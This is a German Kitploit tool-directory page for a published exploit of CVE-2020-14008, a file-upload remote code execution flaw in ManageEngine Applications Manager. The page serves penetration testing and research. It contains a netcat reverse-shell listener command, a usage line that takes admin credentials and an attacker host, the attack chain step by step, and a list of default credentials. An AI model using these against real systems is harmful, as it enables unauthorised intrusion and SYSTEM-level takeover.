Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE | Kitploit
Tools/GitHubGitHub/0x0d3ad/cve-2020-14008
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE

Repository anzeigen
312vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-14008 - ManageEngine Applications Manager RCE

Authentifizierte Remote-Codeausführung durch beliebigen Dateiupload in Zoho ManageEngine Applications Manager (Versionen <= 14720).

Zusammenfassung der Schwachstelle

DetailWert
CVECVE-2020-14008
CVSS7.2 (Hoch)
TypAuthentifizierte RCE / Beliebiger Dateiupload
ProduktZoho ManageEngine Applications Manager
BetroffenVersion 14720 und darunter
VoraussetzungGültige Admin-Anmeldedaten
ErgebnisReverse Shell auf SYSTEM-Ebene

Der Exploit missbraucht die Funktion zum Testen der Weblogic-Monitor-Anmeldedaten. Ein authentifizierter Admin lädt eine schädliche weblogic.jar-Datei auf den erwarteten Weblogic-Bibliothekspfad hoch. Wenn der Anmeldedatentest ausgelöst wird, lädt ManageEngine weblogic.jndi.Environment aus der hochgeladenen JAR über JarLoader.loadClass() und newInstance(), wodurch beliebiger Java-Code ausgeführt wird.

Voraussetzungen

System

  • Python 3.x
  • Java JDK (javac und jar im PATH)
  • nc (netcat) zum Abfangen der Reverse Shell

Python-Abhängigkeiten

pip3 install requests urllib3 lxml

Verwendung

1. Listener starten

nc -lvnp 1337

2. Exploit ausführen

python3 cve-2020-14008.py <URL> <BENUTZERNAME> <PASSWORT> <LHOST> <LPORT>

Beispiele

# Einfach
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Exploit-Ablauf

  1. Anmeldung - Authentifizierung mit Admin-Anmeldedaten, Sitzungscookie abrufen
  2. Ermittlung - Das Basisinstallationsverzeichnis von ManageEngine abrufen
  3. JAR erstellen - Eine schädliche Java-Klasse (weblogic.jndi.Environment) mit einer Reverse Shell kompilieren und in weblogic.jar packen
  4. Hochladen - Die JAR über Directory Traversal in classes/weblogic/version8/ hochladen (Fallback: eine geplante Aufgabe erstellen, um sie zu verschieben)
  5. Auslösen - Den Weblogic-Anmeldedatentest unter /testCredential.do aufrufen, der die schädliche Klasse lädt und instanziiert
  6. Shell - Reverse Shell verbindet sich zurück zum Listener

Standard-Anmeldedaten

BenutzernamePasswort
adminadmin
adminpassword
administratoradministrator
guestguest

Fehlerbehebung

FehlerLösung
release version 7 not supportedJava 21+ hat Java 7 als Ziel aufgegeben. Das Skript verwendet --release 8
FileNotFoundError: weblogic.jarJAR-Kompilierung fehlgeschlagen. Überprüfen, ob javac und jar im PATH sind
No valid response from used sessionUngültige Anmeldedaten
Actionname not foundAufgabenerstellung fehlgeschlagen, Admin-Berechtigungen prüfen

Referenzen

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • ManageEngine Advisory

Haftungsausschluss

Dieses Tool wird ausschließlich für autorisierte Penetrationstests und Sicherheitsforschung bereitgestellt. Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.

Tool herunterladen